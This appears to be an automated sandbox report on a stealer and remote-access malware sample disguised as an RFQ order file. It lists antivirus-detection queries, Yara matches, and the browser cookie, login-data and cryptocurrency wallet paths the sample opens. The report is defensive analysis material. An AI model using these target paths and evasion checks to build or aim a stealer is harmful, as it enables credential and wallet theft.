Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTF78A.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTF78B.tmp VolumeInformation

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434E87

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00441E06 GetUserNameW,

0_2_00441E06

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00433F3A

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.2.RegSvcs.exe.3d96bf0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d007a0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d007a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d4b9d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d96bf0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d4b9d0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1272520755.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1258507285.00000000006B2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1272520755.0000000003D34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1272520755.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 6104, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Source: Yara match	File source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: powershell.exe, 00000010.00000002.1416575661.0000021990076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\atomic\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Binance\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\			Jump to behavior

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Binary or memory string: WIN_81
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Binary or memory string: WIN_XP
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Binary or memory string: WIN_XPe
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Binary or memory string: WIN_VISTA
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Binary or memory string: WIN_7
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Binary or memory string: WIN_8
Source: exhilaratingly.exe, 00000014.00000002.1393593446.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build.exe PID: 6104, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.2.RegSvcs.exe.3d96bf0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d007a0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d007a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d4b9d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d96bf0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3d4b9d0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1272520755.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1258507285.00000000006B2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1272520755.0000000003D34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1272520755.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 6104, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Source: Yara match	File source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 936, type: MEMORYSTR
